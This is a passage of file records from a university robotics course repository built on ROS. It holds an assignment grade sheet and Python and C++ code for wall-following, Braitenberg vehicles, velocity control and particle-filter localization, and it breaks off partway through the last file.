"content_id": "f280571f3ae5e98db41fcd54b93e39d5be89b90b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 596,
"license_type": "no_license",
"max_line_length": 87,
"num_lines": 22,
"path": "/grades/20140614.md",
"repo_name": "shehzi001/amr-ss",
"src_encoding": "UTF-8",
"text": "Grade\n=====\n\n* Comments and documentation: 1/1\n* Random node generation\n * Generation of random nodes: 0.5/0.5\n * Test for reachability of a new node: 0.5/0.5\n * Try to plan before generating random nodes: 0.5/0.5\n (this applies only if the graph is not thrown away after each planning)\n * Try to plan after each new random node: 0.5/0.5\n* Edge creation\n * Creates edges as expected: 0.5/0.5\n * Re-uses the information about connectivity obtained during node generation: 0.5/0.5\n* Implements/uses A-star search: 1/1\n* Planning timeout 1/1\n\n_Total:_ 6 points\n\nFeedback\n========\n\nNice job!"
},
{
"alpha_fraction": 0.5998269319534302,
"alphanum_fraction": 0.6107059121131897,
"avg_line_length": 42.4892463684082,
"blob_id": "0017c32189faa30a6262266194a2426114b915c1",
"content_id": "a1c8d0fe9c2f6269b06659b397209e69d64eec62",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 8089,
"license_type": "no_license",
"max_line_length": 200,
"num_lines": 186,
"path": "/amr_bugs/src/amr_bugs/wallfollower_state_machine.py",
"repo_name": "shehzi001/amr-ss",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n\n\"\"\"\nThis module provides a single construct() function which produces a Smach state\nmachine that implements wallfollowing behavior.\n\nThe constructed state machine has three attached methods:\n * set_ranges(ranges): this function should be called to update the range\n readings\n * get_twist(): returns a twist message that could be directly passed to the\n velocity publisher\n * set_config(config): updates the machine userdata with the new config\n\nThe constructed state machine is preemptable, i.e. each state checks whether\na preemption is requested and returns 'preempted' if that is the case.\n\"\"\"\n\nPACKAGE = 'amr_bugs'\n\nimport roslib\nroslib.load_manifest(PACKAGE)\nimport smach\nfrom preemptable_state import PreemptableState\nfrom math import copysign, sqrt, radians, cos\nfrom types import MethodType\nfrom geometry_msgs.msg import Twist\n\nimport rospy\n\n\n__all__ = ['construct']\n\n# Aligns the vehicle to the wall.\ndef align_to_wall(ud):\n if abs(ud.side_difference) < ud.aligned_limit and ud.side_min < 1.0:\n return 'follow_wall'\n \n ud.velocity = (0, 0, ud.speed_max)\n pass\n\n# Moves in a spiral to find an object with its side.\ndef find_wall(ud):\n # Switches to state align to wall, if the vehicle is not aligned to wall.\n if abs(ud.side_difference) >= ud.aligned_limit:\n return 'align_to_wall'\n \n # Switches to state follow wall, if the range is lower than maximum. That means there is an object.\n if ud.side_min < ud.range_max:\n return 'follow_wall'\n \n # Angular Velocity is reduced to make the spiral bigger.\n ud.spiral_speed = max(ud.spiral_speed - 0.001, 0.1)\n ud.velocity = (ud.speed_max, 0, ud.spiral_speed)\n pass\n\n# Follows a wall.\ndef follow_wall(ud):\n # Switches to find wall. if range is maximum. That means there is no object to follow.\n if ud.side_min >= ud.range_max:\n ud.spiral_speed = ud.spiral_speed_max\n return 'find_wall'\n \n # The sensor used to detect obstacle in front of the vehicle is at 30 degrees and the distance to\n # the middle sensor is 60 degrees. If the vehicle follows the wall, than this sensor should have \n # the range: clearance/cos(60). 
If that is smaller, than there is and object in front of the vehicle.\n front_clearance = ud.clearance / cos(radians(60))\n \n # Error values for the P-Controller are calculated.\n error_angle = ud.side_difference\n error_distance = ud.clearance - ud.side_min\n error_edge = max(front_clearance - ud.range_front, -0.01)\n \n # Sum of the angle error\n ud.error_angle_sum = min(max(ud.error_angle_sum + error_angle + error_edge, -3), 3)\n \n # P-Controllers for all speeds and speeds are limites, angular speed has also an I-Part\n angular_speed = min(max(0.5 * error_angle + ud.error_angle_sum * 0.03 + 2.0 * error_edge, -ud.speed_max), ud.speed_max)\n side_speed = min(max(1.0 * error_distance, -ud.speed_max), ud.speed_max) \n # Forward speed gets reduces by the size of angular speed, to make better turns.\n forward_speed = min(max(ud.speed_max - abs(angular_speed), 0), ud.speed_max)\n \n ud.velocity = (forward_speed, side_speed, angular_speed)\n pass\n\n#==============================================================================\n\ndef set_ranges(self, ranges):\n \"\"\"\n This function will be attached to the constructed wallfollower machine.\n Its argument is a list of Range messages as received by a sonar callback.\n \"\"\"\n # Switches the sensors based on which side is used to follow a wall.\n if self.userdata.mode == 0:\n self.userdata.full_side_min = min(ranges[0].range, ranges[1].range, ranges[14].range, ranges[15].range)\n self.userdata.side_min = min(ranges[0].range, ranges[15].range)\n self.userdata.side_difference = ranges[15].range - ranges[0].range\n self.userdata.range_front = ranges[2].range\n elif self.userdata.mode == 1:\n self.userdata.full_side_min = min(ranges[6].range, ranges[7].range, ranges[8].range, ranges[9].range)\n self.userdata.side_min = min(ranges[7].range, ranges[8].range)\n self.userdata.side_difference = ranges[8].range - ranges[7].range\n self.userdata.range_front = ranges[5].range\n\ndef get_twist(self):\n \"\"\"\n This function will be attached to the constructed wallfollower machine.\n It creates a Twist message that could be directly published by a velocity\n publisher. 
The values for the velocity components are fetched from the\n machine userdata.\n \"\"\"\n twist = Twist()\n twist.linear.z = 0\n twist.angular.x = 0\n twist.angular.y = 0\n \n # Switches the sign of the output based on which side is used to follow a wall.\n if self.userdata.mode == 0:\n twist.linear.x = self.userdata.velocity[0]\n twist.linear.y = -self.userdata.velocity[1]\n twist.angular.z = -self.userdata.velocity[2]\n elif self.userdata.mode == 1:\n twist.linear.x = self.userdata.velocity[0]\n twist.linear.y = self.userdata.velocity[1]\n twist.angular.z = self.userdata.velocity[2]\n \n return twist\n\n\ndef set_config(self, config):\n \"\"\"\n This function will be attached to the constructed wallfollower machine.\n It updates the relevant fields in the machine userdata.\n Its argument is the config object that comes from ROS dynamic reconfigure\n client.\n \"\"\"\n self.userdata.mode = config['mode']\n self.userdata.clearance = config['clearance']\n return config\n\n\ndef construct():\n sm = smach.StateMachine(outcomes=['preempted'])\n # Attach helper functions\n sm.set_ranges = MethodType(set_ranges, sm, sm.__class__)\n sm.get_twist = MethodType(get_twist, sm, sm.__class__)\n sm.set_config = MethodType(set_config, sm, sm.__class__) \n # Set initial values in userdata\n sm.userdata.velocity = (0, 0, 0)\n sm.userdata.mode = 1\n sm.userdata.clearance = 0.5\n sm.userdata.spiral_speed_max = 0.7\n sm.userdata.spiral_speed = sm.userdata.spiral_speed_max \n sm.userdata.full_side_min = 0\n sm.userdata.side_min = 0\n sm.userdata.side_difference = 0\n sm.userdata.range_front = 0\n sm.userdata.range_max = 5.0\n sm.userdata.speed_max = 0.5\n sm.userdata.aligned_limit = 0.2\n sm.userdata.error_angle_sum = 0\n \n # Add states\n with sm:\n smach.StateMachine.add('ALIGN_TO_WALL',\n PreemptableState(align_to_wall,\n input_keys=['side_min', 'range_max', 'side_difference', 'speed_max', 'aligned_limit'],\n output_keys=['velocity'],\n outcomes=['follow_wall', 'find_wall']),\n transitions={'follow_wall': 'FOLLOW_WALL',\n 'find_wall': 'FIND_WALL'})\n \n smach.StateMachine.add('FIND_WALL',\n PreemptableState(find_wall,\n input_keys=['speed_max', 'side_min', 'side_difference', 'range_max', 'spiral_speed', 'aligned_limit'],\n output_keys=['velocity', 'spiral_speed'],\n outcomes=['follow_wall', 'align_to_wall']),\n transitions={'follow_wall': 'FOLLOW_WALL',\n 'align_to_wall': 'ALIGN_TO_WALL'})\n \n smach.StateMachine.add('FOLLOW_WALL',\n PreemptableState(follow_wall,\n input_keys=['error_angle_sum', 'speed_max', 'side_difference', 'range_max', 'range_front', 'side_min', 'clearance', 'spiral_speed', 'spiral_speed_max'],\n output_keys=['velocity', 'spiral_speed', 'error_angle_sum'],\n outcomes=['find_wall']),\n transitions={'find_wall': 'FIND_WALL'})\n return sm\n"
},
{
"alpha_fraction": 0.6407679915428162,
"alphanum_fraction": 0.6513547301292419,
"avg_line_length": 31.208091735839844,
"blob_id": "5ef46cb629eec49e8cc78c5920e52804168bb411",
"content_id": "9ec93829b52d01e6309ea2dfa20bdebc9a72a0b0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 5573,
"license_type": "no_license",
"max_line_length": 145,
"num_lines": 173,
"path": "/amr_localization/nodes/pose_likelihood_server.cpp",
"repo_name": "shehzi001/amr-ss",
"src_encoding": "UTF-8",
"text": "#define _USE_MATH_DEFINES\n#include <cmath>\n\n#include <ros/ros.h>\n#include <ros/console.h>\n#include <ros/assert.h>\n#include <tf/transform_listener.h>\n#include <tf/tf.h>\n#include <sensor_msgs/LaserScan.h>\n#include <amr_srvs/GetPoseLikelihood.h>\n#include <amr_srvs/GetNearestOccupiedPointOnBeam.h>\n#include <amr_srvs/SwitchRanger.h>\n\nclass PoseLikelihoodServerNode\n{\n\npublic:\n\n // Constructor\n PoseLikelihoodServerNode()\n {\n ros::NodeHandle pn(\"~\");\n laserscan_subscriber_ = nh_.subscribe(\"/scan_front\", 1, &PoseLikelihoodServerNode::laserCallback, this);\n beam_client_ = nh_.serviceClient<amr_srvs::GetNearestOccupiedPointOnBeam> (\"/occupancy_query_server/get_nearest_occupied_point_on_beam\");\n likelihood_server_ = pn.advertiseService(\"/pose_likelihood_server/get_pose_likelihood\", &PoseLikelihoodServerNode::likelihoodCallback, this);\n ROS_INFO(\"Started [pose_likelihood_server] node.\");\n getLaserTransform();\n }\n\n // Step 1: Get position of laser in respect to the base\n void getLaserTransform()\n {\n try\n {\n listener.waitForTransform(\"/base_link\", \"/base_laser_front_link\", ros::Time(0), ros::Duration(2.0));\n listener.lookupTransform(\"/base_link\", \"/base_laser_front_link\", ros::Time(0), laser_transform);\n }\n catch (tf::TransformException& ex)\n {\n ROS_ERROR(\"Transform lookup failed: %s\", ex.what());\n }\n }\n\n // Step 2: Get the sensed laser scans and store them.\n void laserCallback(const sensor_msgs::LaserScanConstPtr& msg)\n {\n // Gets parameters of the laser\n range_max = msg->range_max;\n angle_min = msg->angle_min;\n angle_increment = msg->angle_increment;\n no_of_lasers = lround(std::abs(msg->angle_max - angle_min) / angle_increment) + 1;\n\n // Saves the all real sensed readings as z_r\n for (int i = 0; i < no_of_lasers; i++)\n {\n z_r[i] = msg->ranges[i];\n }\n }\n\n // Step 3: Implement likelihood callback\n bool likelihoodCallback(amr_srvs::GetPoseLikelihood::Request& request, amr_srvs::GetPoseLikelihood::Response& response)\n {\n // This datatype is passed around in ROS messages and is just a data storage with no associated functions.\n geometry_msgs::Pose pose_msg;\n pose_msg = request.pose.pose;\n // Convert pose message to transform\n tf::Transform pose_tf;\n tf::poseMsgToTF(pose_msg, pose_tf);\n // Send the request to OQS.\n amr_srvs::GetNearestOccupiedPointOnBeam srv_pointonbeam;\n std::vector<geometry_msgs::Pose2D> beams_poses;\n beams_poses.resize(16);\n\n for (int i = 0; i < no_of_lasers; i++)\n {\n query_input = pose_tf * laser_transform;// Transforming beam_pose from base link to odom\n\n // Extracting beam_pose x,y,theta w.r.t odom\n beams_poses[i].x = query_input.getOrigin().getX();\n beams_poses[i].y = query_input.getOrigin().getY();\n tf::Quaternion quaternion = query_input.getRotation();\n beams_poses[i].theta = tf::getYaw(quaternion) + angle_min + (angle_increment * i); // Calculates theta of laser sample\n }\n\n srv_pointonbeam.request.beams = beams_poses;\n srv_pointonbeam.request.threshold = 50.0;// Changing this changes the no. 
of red squares.\n\n if (beam_client_.call(srv_pointonbeam))\n {\n double sigma = 0.5;\n double w = 0.0;\n double sum = 0.0;\n double average_prob = 0.0;\n int count = 0;\n\n for (int i = 0; i < no_of_lasers; i++)\n {\n z_f[i] = srv_pointonbeam.response.distances[i]; // Fake distances\n\n // Clamping distances\n if (z_f[i] > range_max) { z_f[i] = range_max; }\n else if (z_f[i] < 0.0) { z_f[i] = 0.0; }\n\n // Compute the probabilities\n w = (1.0 / (sigma * sqrt(2.0 * M_PI))) * (exp(-pow((z_f[i] - z_r[i]), 2) / (2.0 * pow(sigma, 2))));\n\n sum = sum + w;\n if (std::abs(z_f[i]-z_r[i]) < (sigma * 2)) { count ++; }\n }\n\n average_prob = sum / no_of_lasers;\n\n // Clamping probabilities\n if (average_prob > 1.0) { average_prob = 1.0; }\n else if (average_prob < 0.0) { average_prob = 0.0; }\n\n // Respond as likelihood\n response.likelihood = average_prob;\n// if (count < 12) { response.likelihood = 0; }\n// else { response.likelihood = average_prob; }\n\n return true;\n }\n else\n {\n ROS_WARN(\"Server get nearest occupied point on the beam failed.\");\n return false;\n }\n }\n\nprivate:\n\n ros::NodeHandle nh_;\n ros::Subscriber laserscan_subscriber_;\n ros::ServiceServer likelihood_server_;\n ros::ServiceClient beam_client_;\n int no_of_lasers;\n double range_max;\n double angle_min;\n double angle_increment;\n double z_r[16];\n double z_f[16];\n tf::TransformListener listener;\n tf::StampedTransform sensor_transforms[16];\n tf::StampedTransform laser_transform;\n tf::Transform query_input;\n};\n\nint main(int argc, char** argv)\n{\n ros::init(argc, argv, \"pose_likelihood_server\");\n ros::NodeHandle nh;\n // Wait until SwitchRanger service (and hence stage node) becomes available.\n ROS_INFO(\"Waiting for the /switch_ranger service to be advertised...\");\n ros::ServiceClient switch_ranger_client = nh.serviceClient<amr_srvs::SwitchRanger> (\"/switch_ranger\");\n switch_ranger_client.waitForExistence();\n // Make sure that the hokuyo laser is available and enable them.\n amr_srvs::SwitchRanger srv;\n srv.request.name = \"scan_front\";\n srv.request.state = true;\n if (switch_ranger_client.call(srv))\n {\n ROS_INFO(\"Enabled hokuyo laser.\");\n }\n else\n {\n ROS_ERROR(\"Hokuyo laser is not available, shutting down.\");\n return 1;\n }\n PoseLikelihoodServerNode plsn;\n ros::spin();\n return 0;\n}\n\n"
},
{
"alpha_fraction": 0.7159596085548401,
"alphanum_fraction": 0.722626268863678,
"avg_line_length": 47.04854202270508,
"blob_id": "ce52bd5f06e781f90ce798553989265eb4ffe540",
"content_id": "3425dd8c619e197530be36ee76f440443e78c750",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 4950,
"license_type": "no_license",
"max_line_length": 160,
"num_lines": 103,
"path": "/amr_braitenberg/nodes/braitenberg_vehicle.cpp",
"repo_name": "shehzi001/amr-ss",
"src_encoding": "UTF-8",
"text": "/** Description of behavior:\n *\n * Braitenberg Type A:\n * In this mode the vehicle tries not to crush into obstacles. The vehicle dodges sideways.\n * If the transmission factor is to small the vehicle is slow, can not make fast turns and can still crash.\n * If it is to high and the vehicle is driving between obstacles the vehicle the rotation angle oscillates.\n * And if the factor is negative, the vehicle drives perpendicular away from the obstacle.\n *\n * Braitenberg Type B:\n * A Braitenberg type B tries to reach a light source. In our case that is an obstacle and so the vehicle\n * drives perpendicular to the object and crashes. If the transmission factor is negative, the vehicle drives\n * sideways away from an obstacle.\n *\n * Braitenberg Type C:\n * In this combined mode the turn behaviors of the type A and type B vehicle cancel each other out, but the\n * speed is combined. So if the transmission factor of the type A behavior is higher than the transmission\n * factor for type B than the vehicle tries not to crash into an obstacle. The difference to a pure type\n * A vehicle is than, that it's speed is higher but the turn speed is damped. If the transmission factor of\n * the type B behavior is higher, than the vehicle crashes. If the factors are negative, than the vehicle\n * drives away from the obstacle. And depending on which type has the lowest transmission, the vehicle drives\n * sideways or perpendicular away. */\n\n\n#include <ros/ros.h>\n#include <ros/console.h>\n#include <dynamic_reconfigure/server.h>\n#include <geometry_msgs/Twist.h>\n\n#include <amr_msgs/Ranges.h>\n#include <amr_msgs/WheelSpeeds.h>\n#include <amr_srvs/SwitchRanger.h>\n#include <amr_braitenberg/BraitenbergVehicleConfig.h>\n#include \"braitenberg_vehicle.h\"\n\nros::Subscriber sonar_subscriber;\nros::Publisher wheel_speeds_publisher;\nBraitenbergVehicle::UPtr vehicle;\n\n/** Reconfiguration callback is triggered every time the user changes some\n * field through the rqt_reconfigure interface. */\nvoid reconfigureCallback(amr_braitenberg::BraitenbergVehicleConfig &config, uint32_t level)\n{\n /** To reconfigure a new braitenberg vehicle is created and appointed.\n * Because the config.type is an int value it is beeing casted to the braitenberg vehicle type. */\n vehicle = BraitenbergVehicle::UPtr(new BraitenbergVehicle(static_cast<BraitenbergVehicle::Type>(config.type),\n config.factor1,\n config.factor2));\n\n ROS_INFO(\"Vehicle reconfigured: type %i, factors %.2f and %.2f\", config.type, config.factor1, config.factor2);\n}\n\n/** Sonar callback is triggered every time the Stage node publishes new data\n * to the sonar topic. */\nvoid sonarCallback(const amr_msgs::Ranges::ConstPtr& msg)\n{\n amr_msgs::WheelSpeeds m;\n\n /** To calculate the wheel speeds, the output from the lasers and the speeds are given to the\n * computeWheelSpeeds methods. Because WheelSpeeds is a vector with zero elemnts it's resized\n * to store two speeds for the left and right wheel. The handover of the speeds is done by\n * call-by-reference, so that a return is not needed. Values from the sensors are beeing\n * normalized here as well. 
*/\n m.speeds.resize(2);\n vehicle->computeWheelSpeeds(msg->ranges[0].range / msg->ranges[0].max_range, msg->ranges[1].range / msg->ranges[1].max_range, m.speeds.at(0), m.speeds.at(1));\n\n wheel_speeds_publisher.publish(m);\n ROS_DEBUG(\"[%.2f %.2f] --> [%.2f %.2f]\", msg->ranges[0].range, msg->ranges[1].range, m.speeds[0], m.speeds[1]);\n}\n\nint main(int argc, char** argv)\n{\n ros::init(argc, argv, \"braitenberg_vehicle\");\n ros::NodeHandle nh;\n // Wait until SwitchRanger service (and hence stage node) becomes available.\n ROS_INFO(\"Waiting for the /switch_ranger service to be advertised...\");\n ros::ServiceClient switch_ranger_client = nh.serviceClient<amr_srvs::SwitchRanger>(\"/switch_ranger\");\n switch_ranger_client.waitForExistence();\n // Make sure that the braitenberg sonars are available and enable them.\n amr_srvs::SwitchRanger srv;\n srv.request.name = \"sonar_braitenberg\";\n srv.request.state = true;\n if (switch_ranger_client.call(srv))\n {\n ROS_INFO(\"Enabled braitenberg sonars.\");\n }\n else\n {\n ROS_ERROR(\"Braitenberg sonars are not available, shutting down.\");\n return 1;\n }\n // Create default vehicle.\n vehicle = BraitenbergVehicle::UPtr(new BraitenbergVehicle);\n // Create subscriber and publisher.\n sonar_subscriber = nh.subscribe(\"/sonar_braitenberg\", 100, sonarCallback);\n wheel_speeds_publisher = nh.advertise<amr_msgs::WheelSpeeds>(\"/cmd_vel_diff\", 100);\n // Create dynamic reconfigure server.\n dynamic_reconfigure::Server<amr_braitenberg::BraitenbergVehicleConfig> server;\n server.setCallback(boost::bind(&reconfigureCallback, _1, _2));\n // Start infinite loop.\n ROS_INFO(\"Started braitenberg vehicle node.\");\n ros::spin();\n return 0;\n}\n\n"
},
{
"alpha_fraction": 0.6718888282775879,
"alphanum_fraction": 0.6754360198974609,
"avg_line_length": 40.75308609008789,
"blob_id": "51e58545577cc92083679b28f803519fb9e7e114",
"content_id": "ca8f6018ab2f9573962311881e4c7367e0bbfbf6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 3383,
"license_type": "no_license",
"max_line_length": 112,
"num_lines": 81,
"path": "/amr_navigation/src/omni_velocity_controller.cpp",
"repo_name": "shehzi001/amr-ss",
"src_encoding": "UTF-8",
"text": "#include <ros/console.h>\n#include \"omni_velocity_controller.h\"\n\nOmniVelocityController::OmniVelocityController(double l_max_vel, double l_max_acc, double l_tolerance,\n double a_max_vel, double a_max_acc, double a_tolerance)\n: l_max_vel_(l_max_vel)\n, l_max_acc_(l_max_acc)\n, l_tolerance_(l_tolerance)\n, a_max_vel_(a_max_vel)\n, a_max_acc_(a_max_acc)\n, a_tolerance_(a_tolerance)\n{\n // How much time the vehicle needs to stop based on the acceleration\n linear_time_to_break_ = l_max_vel_ / l_max_acc_;\n angular_time_to_break_ = a_max_vel_ / a_max_acc_;\n\n // The formular velocity to time \"f(time) = -accelration_max * time + velocity_max\"\n // is integrated to get the surface of the function, which is the distance to break.\n linear_break_point_ = -(l_max_acc_/2) * pow(linear_time_to_break_, 2) + l_max_vel_ * linear_time_to_break_;\n angular_break_point_ = -(a_max_acc_/2) * pow(angular_time_to_break_, 2) + a_max_vel_ * angular_time_to_break_;\n\n linear_deacceleration_factor_ = l_max_vel_ / linear_break_point_;\n angular_deacceleration_factor_ = a_max_vel_ / angular_break_point_;\n}\n\nvoid OmniVelocityController::setTargetPose(const Pose& pose)\n{\n target_pose_ = pose;\n linear_complete_ = false;\n angular_complete_ = false;\n}\n\nbool OmniVelocityController::isTargetReached() const\n{\n return linear_complete_ & angular_complete_;\n}\n\nVelocity OmniVelocityController::computeVelocity(const Pose& actual_pose)\n{\n // Displacement and orientation to the target in world frame\n double x_dist = target_pose_.x - actual_pose.x;\n double y_dist = target_pose_.y - actual_pose.y;\n\n // Step 1: compute remaining distances\n double linear_dist = getDistance(target_pose_, actual_pose);\n double angular_dist = getShortestAngle(target_pose_.theta, actual_pose.theta);\n\n if (std::abs(linear_dist) < l_tolerance_ && std::abs(angular_dist) < a_tolerance_)\n {\n linear_complete_ = true;\n angular_complete_ = true;\n return Velocity();\n }\n\n // Step 2: compute velocities\n double linear_vel = 0.0;\n double angular_vel = 0.0;\n\n // If the distance is bigger than the break point, than the vehicle drives with maximum speed,\n // else the speed is the distance multiplied with the deacceleration factor to reach the target smoothly.\n if (std::abs(linear_dist) > linear_break_point_) { linear_vel = l_max_vel_; }\n else { linear_vel = linear_dist * linear_deacceleration_factor_; }\n\n if (std::abs(angular_dist) > angular_break_point_) { angular_vel = a_max_vel_; }\n else { angular_vel = angular_dist * angular_deacceleration_factor_; }\n\n // Step 3: Divide linear velocity in velocities for x and y direction\n double x_ratio = x_dist / linear_dist;\n double y_ratio = y_dist / linear_dist;\n\n double x_vel = x_ratio * linear_vel;\n double y_vel = y_ratio * linear_vel;\n\n // Step 4: Velocities for X and Y direction are split to forward movement\n // and sideward movement by rotating around theta.\n return Velocity(+ std::copysign(x_vel, x_dist) * cos(actual_pose.theta)\n + std::copysign(y_vel, y_dist) * sin(actual_pose.theta), // Forward movement\n - std::copysign(x_vel, x_dist) * sin(actual_pose.theta)\n + std::copysign(y_vel, y_dist) * cos(actual_pose.theta), // Sideward movement\n std::copysign(angular_vel, angular_dist)); // Angular movement\n}\n\n"
},
{
"alpha_fraction": 0.7213420271873474,
"alphanum_fraction": 0.7213420271873474,
"avg_line_length": 21.33333396911621,
"blob_id": "0a4b04c8f6c57466207d4e1a73740bc1b1c5aef9",
"content_id": "8e18523cd8f7bc2d9eb2bb2c65c2da46278fe16c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1073,
"license_type": "no_license",
"max_line_length": 81,
"num_lines": 48,
"path": "/amr_navigation/include/omni_velocity_controller.h",
"repo_name": "shehzi001/amr-ss",
"src_encoding": "UTF-8",
"text": "#ifndef OMNI_VELOCITY_CONTROLLER_H\n#define OMNI_VELOCITY_CONTROLLER_H\n\n#include \"velocity_controller.h\"\n\n/** An implementation of velocity controller that moves the robot as if it had\n * an omni-directional base. */\nclass OmniVelocityController : public VelocityController\n{\n\npublic:\n\n OmniVelocityController(double l_max_vel, double l_max_acc, double l_tolerance,\n double a_max_vel, double a_max_acc, double a_tolerance);\n\n virtual void setTargetPose(const Pose& pose);\n\n virtual bool isTargetReached() const;\n\n virtual Velocity computeVelocity(const Pose& actual_pose);\n\nprivate:\n\n Pose target_pose_;\n\n bool linear_complete_;\n bool angular_complete_;\n\n double l_max_vel_;\n double l_max_acc_;\n double l_tolerance_;\n\n double a_max_vel_;\n double a_max_acc_;\n double a_tolerance_;\n\n double linear_time_to_break_;\n double angular_time_to_break_;\n\n double linear_break_point_;\n double angular_break_point_;\n\n double linear_deacceleration_factor_;\n double angular_deacceleration_factor_;\n\n};\n\n#endif /* OMNI_VELOCITY_CONTROLLER_H */\n\n"
},
{
"alpha_fraction": 0.5427682995796204,
"alphanum_fraction": 0.5489891171455383,
"avg_line_length": 17.342857360839844,
"blob_id": "b4d08f1d78b8aab6208e938f068164ebd1c2acd1",
"content_id": "087e40e58f97ae23d0fa1ad9740d780a3c3fc6ee",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 643,
"license_type": "no_license",
"max_line_length": 74,
"num_lines": 35,
"path": "/amr_navigation/include/pose.h",
"repo_name": "shehzi001/amr-ss",
"src_encoding": "UTF-8",
"text": "#ifndef POSE_H\n#define POSE_H\n\n#include <iostream>\n\n/** This structure represents a pose in 2d space. */\nstruct Pose\n{\n\n float x;\n float y;\n float theta;\n\n Pose() : x(0), y(0), theta(0) { }\n\n Pose(float x, float y, float theta) : x(x), y(y), theta(theta) { }\n\n Pose(const Pose& other) : x(other.x), y(other.y), theta(other.theta) { }\n\n const Pose& operator=(const Pose& other)\n {\n x = other.x;\n y = other.y;\n theta = other.theta;\n return *this;\n }\n\n friend std::ostream& operator<<(std::ostream& out, const Pose& p)\n {\n return out << \"[\" << p.x << \", \" << p.y << \", \" << p.theta << \"]\";\n }\n\n};\n\n#endif /* POSE_H */\n\n"
},
{
"alpha_fraction": 0.6575299501419067,
"alphanum_fraction": 0.6748582124710083,
"avg_line_length": 29.21904754638672,
"blob_id": "090ea4aff105120712bfd43909b685b287182724",
"content_id": "3b436465c4606367cb07883eb8394521f06fd374",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 3174,
"license_type": "no_license",
"max_line_length": 120,
"num_lines": 105,
"path": "/amr_localization/include/motion_model.h",
"repo_name": "shehzi001/amr-ss",
"src_encoding": "UTF-8",
"text": "#ifndef MOTION_MODEL_H\n#define MOTION_MODEL_H\n\n#include <random>\n\n#include \"pose.h\"\n\n/** This class represents a motion model for omnidirectional robot and could be\n * used to sample the possible pose given the starting pose and the commanded\n * robot's motion.\n *\n * The two parameters of the class is standard deviations of translational and\n * rotational components of the motion.\n *\n * The motion is decomposed into two translations along the x axis of the\n * robot (forward), and along the y axis of the robot (lateral), and one\n * rotation.\n *\n * Usage:\n *\n * @code\n * // Create motion model with 0.02 and 0.01 stddev\n * MotionModel motion_model(0.02, 0.01);\n * // Set the commanded robot's motion\n * motion_model.setMotion(0.5, 0.1, 0.1);\n * // Sample the possible pose given the starting pose\n * // Note that it could be repeated multiple times for the same starting\n * // pose of for different starting poses\n * Pose new_pose = motion_model.sample(pose);\n * @code\n *\n * */\nclass MotionModel\n{\n\npublic:\n\n MotionModel(double sigma_translation, double sigma_rotation)\n : forward_(0.0)\n , lateral_(0.0)\n , rotation_(0.0)\n , generator_(device_())\n , distribution_trans_(0, sigma_translation)\n , distribution_rot_(0, sigma_rotation)\n {\n }\n\n /** Set the commanded robot's motion. */\n void setMotion(double forward, double lateral, double rotation)\n {\n forward_ = forward;\n lateral_ = lateral;\n rotation_ = rotation;\n }\n\n /** Sample a possible pose resulting from the commanded robot's motion, if\n * the robot was in given pose. */\n Pose sample(const Pose& pose)\n {\n // Rotation of the motion\n double x_motion = forward_ * cos(-pose.theta) + lateral_ * sin(-pose.theta);\n double y_motion = -forward_ * sin(-pose.theta) + lateral_ * cos(-pose.theta);\n\n //Use forward, lateral, rotation to get desired motion delta_rot1, delta_trans, delta_rot2.(slide 25 localization 2)\n double delta_trans = sqrt(pow(x_motion, 2) + pow(y_motion, 2));\n double delta_rot1 = atan2(y_motion, x_motion);\n double delta_rot2 = rotation_ - delta_rot1;\n\n //Assign the noise distributions\n double trans_error = distribution_trans_(generator_);\n double rot1_error = distribution_rot_(generator_);\n double rot2_error = distribution_rot_(generator_);\n\n //Add noise\n double delta_trans_hat = delta_trans + trans_error;\n double delta_rot1_hat = delta_rot1 + rot1_error;\n double delta_rot2_hat = delta_rot2 + rot2_error;\n\n //Get the new pose\n Pose new_pose;\n new_pose.x = pose.x + delta_trans_hat * cos(rotation_ + delta_rot1_hat);\n new_pose.y = pose.y + delta_trans_hat * sin(rotation_ + delta_rot1_hat);\n new_pose.theta = normalizeAngle(pose.theta + delta_rot1_hat + delta_rot2_hat);\n\n return new_pose;\n }\n\nprivate:\n\n inline double normalizeAngle(double angle)\n {\n return atan2(sin(angle), cos(angle));\n }\n\n double forward_;\n double lateral_;\n double rotation_;\n std::random_device device_;\n std::mt19937 generator_;\n std::normal_distribution<double> distribution_trans_;\n std::normal_distribution<double> distribution_rot_;\n\n};\n\n#endif /* MOTION_MODEL_H */\n\n"
},
{
"alpha_fraction": 0.6427238583564758,
"alphanum_fraction": 0.6641790866851807,
"avg_line_length": 27.972972869873047,
"blob_id": "dd4813b6a4c1a7a7f5b6b35546c77ad019e72abc",
"content_id": "17c7c78040585ea069fc07373ec61d069b8f3098",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1072,
"license_type": "no_license",
"max_line_length": 109,
"num_lines": 37,
"path": "/amr_braitenberg/src/braitenberg_vehicle.cpp",
"repo_name": "shehzi001/amr-ss",
"src_encoding": "UTF-8",
"text": "#include \"braitenberg_vehicle.h\"\n\nBraitenbergVehicle::BraitenbergVehicle()\n: type_(TYPE_A)\n, factor1_(1.0)\n, factor2_(0.0)\n{\n}\n\nBraitenbergVehicle::BraitenbergVehicle(Type type, float factor1, float factor2)\n: type_(type)\n, factor1_(factor1)\n, factor2_(factor2)\n{\n}\n\n/** Depending on the Braitenberg type, the input is mapped to the output.\n * The factor1 and factor2 are used to scale the output values. And the input values\n * are normalized by dividing them through 4, because that is the maximum input value. */\nvoid BraitenbergVehicle::computeWheelSpeeds(float left_in, float right_in, float& left_out, float& right_out)\n{\n switch (this->type_)\n {\n case TYPE_A:\n left_out = this->factor1_ * left_in;\n right_out = this->factor1_ * right_in;\n break;\n case TYPE_B:\n left_out = this->factor1_ * right_in;\n right_out = this->factor1_ * left_in;\n break;\n case TYPE_C:\n left_out = this->factor1_ * left_in + this->factor2_ * right_in;\n right_out = this->factor1_ * right_in + this->factor2_ * left_in;\n break;\n 